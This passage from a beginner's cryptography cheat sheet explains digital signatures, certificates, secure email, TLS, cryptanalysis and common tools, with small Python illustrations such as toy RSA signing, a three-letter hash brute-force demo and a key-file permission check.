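Hash-then-sign as just described can be sketched with the same style of toy RSA numbers (tiny, insecure parameters for illustration only; real signature schemes also apply padding such as PSS):

```python
import hashlib

# Toy RSA key pair (demonstration-sized numbers, trivially factorable).
p, q = 61, 53
n, e = p * q, 17
d = pow(e, -1, (p - 1) * (q - 1))

message = b"pay Bob 10 RON"
# Hash the message and reduce it into the modulus (only because n is tiny here).
h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n

signature = pow(h, d, n)           # "encrypt" the hash with the private key

# Anyone holding only the public key (e, n) can verify:
recovered_hash = pow(signature, e, n)
expected = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
print("valid:", recovered_hash == expected)  # True
```

Tampering with the message changes its hash, so verification against the original signature fails.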
A sender can also send a plaintext message along with a signature created with their private key, if the privacy of the message is not important but validating the identity of the sender is.

Message signing is also the basis of SSL/TLS certificate validation. A certificate contains a public key and a signature of that key generated with the private key of a trusted certificate authority. An SSL/TLS client (such as a web browser) can confirm the authenticity of the public key by validating the certificate signature using the public key of the certificate authority that signed it. An SSL/TLS client can validate the identity of a server by encrypting a large random number with the public key in the server certificate. If the server can decrypt the random number with its private key and return it, the client can assume the server is what it says it is.

"Self-signed" certificates are merely public keys signed with the corresponding private key. This isn't as trustworthy (assuming you have reasons to trust a certificate authority) but also doesn't require interaction with a certificate authority. However, ultimately the buck has to stop somewhere, and even certificate authority "root certificates" are self-signed.

Rather than the centralized certificate authority model (where certain authorities are trusted to sign certificates), email encryption tools like GPG have a "web of trust" model, where someone's public key can be signed by many other individuals or entities, so that if you trust at least some of those others it gives you greater assurance that a public key is valid and belongs to the indicated person. Without any such signatures, someone could presumably publish a key purporting to be someone else and there'd be no easy way to validate it.

4.3 secure email

If you want people to be able to send you secure email (such as with PGP, GPG, or S/MIME) you create a public key pair (K1, K2) and publish the public key K2.
Someone who wants to send you mail picks a cipher and generates a unique, random key for that cipher. They encrypt their plaintext message with that cipher and key, encrypt the key with your public key, and send you a message containing the ciphertext, the cipher algorithm they used, and the encrypted cipher key. You can decrypt the cipher key with your private key, and then decrypt their message from the ciphertext and indicated cipher. Note that for this model to work, everyone who wants to receive encrypted email has to publish a public key.

4.4 SSL/TLS

SSL (Secure Sockets Layer, now deprecated) and TLS (Transport Layer Security) use all of the above cryptographic primitives to secure data sent over a network. As a result the protocol is rather complicated, but in summary it does these things:

- client and server agree on a "cipher suite" to use, which consists of:
  - a method for key exchange (via the public/private key pair in a certificate or Diffie-Hellman key exchange)
  - a method for server validation (based on the public-key algorithm used in its certificate)
  - a symmetric cipher for bulk data encryption
  - a hash algorithm to use for message authentication (actually an HMAC or "Hashed Message Authentication Code", which hashes a combination of a secret key and the data)
- establish a random shared key for the symmetric cipher and HMAC using the specified key exchange method
- transmit data using the specified symmetric cipher and HMAC algorithms

5 Cryptanalysis

Cryptanalysis is the study of weaknesses in cryptographic algorithms and protocols. In general, good algorithms and protocols have been subjected to lots of public cryptanalysis that has not resulted in attacks that are significantly better than brute-force.
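As a toy illustration of that brute-force baseline, recovering a short lowercase string from its SHA-256 hash by exhaustive search (the string and length are arbitrary examples; at realistic password lengths and with salted, slow hashes this quickly becomes infeasible):

```python
import hashlib
from itertools import product
from string import ascii_lowercase

target = hashlib.sha256(b"cab").hexdigest()  # pretend we only have the hash

def brute_force(target_hex, length=3):
    """Try every lowercase string of the given length until the hash matches."""
    for combo in product(ascii_lowercase, repeat=length):
        candidate = "".join(combo).encode()
        if hashlib.sha256(candidate).hexdigest() == target_hex:
            return candidate
    return None

print(brute_force(target))  # finds b'cab' after at most 26**3 attempts
```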
It’s a complex topic, and this is a pretty good introduction: https://research.checkpoint.com/cryptographic-attacks-a-guide-for-the-perplexed

6 Cryptographic tools

6.1 OpenSSL

Although it has taken a lot of heat for some of its previous security issues (particularly “Heartbleed”), OpenSSL is still the most widely used cryptographic library because of its portability and completeness. The openssl command-line utility also provides a lot of useful functionality. It can be used to create certificate requests or even to sign certificates, encrypt/decrypt files, transform several kinds of file formats used for cryptographic data, and more. Of particular use is the openssl s_client command, which can initiate an SSL/TLS client connection but, more importantly, shows a lot of useful debugging data about the protocol negotiation, including the certificate and cipher suite properties.

6.2 gnutls

The GNU Project’s SSL/TLS library, which includes a gnutls-cli utility with similar (but less extensive) functionality for SSL/TLS client connections and encryption/decryption.

6.3 gnupg

Primarily intended for encrypting or decrypting secure mail messages, it also provides some functionality for encrypting or decrypting files and creating or validating signatures.

7 General cryptographic advice

7.1 Use established, publicly analyzed algorithms and tools

Schneier’s Law: “Anyone can create an algorithm that they can’t break.”
https://www.schneier.com/blog/archives/2011/04/schneiers_law.html

Resist the urge to create and use your own cryptographic algorithms and protocols. Cryptography is hard, and even expert cryptographers have created methods that, once exposed to public analysis, turned out to be easy to break.

7.2 Zealously protect keys and credentials

Often the easiest way to break a cryptographic system is to find the keys being used. This may be easier than you think. What if you left that certificate private key in a publicly-readable file?
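One concrete check for that question: verify that a key file has no group or world permission bits. This is a minimal sketch assuming POSIX-style file permissions (the filename and key contents are placeholders).

```python
import os
import stat

def key_file_is_private(path: str) -> bool:
    """Return True if only the file's owner has any access (POSIX permissions)."""
    mode = os.stat(path).st_mode
    # Any group/other bits set means the key is exposed beyond its owner.
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0

# Example: a freshly written private key should be chmod 0600.
with open("server.key", "w") as f:
    f.write("-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----\n")
os.chmod("server.key", 0o600)
print(key_file_is_private("server.key"))   # True on POSIX systems
```

A check like this makes a reasonable startup assertion in any service that loads key material from disk.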
What if it’s copied into backups that are available to other untrusted users? Think carefully about how you handle and store that kind of sensitive material.

Sursa: https://cybercoastal.com/cryptography-cheat-sheet-for-beginners/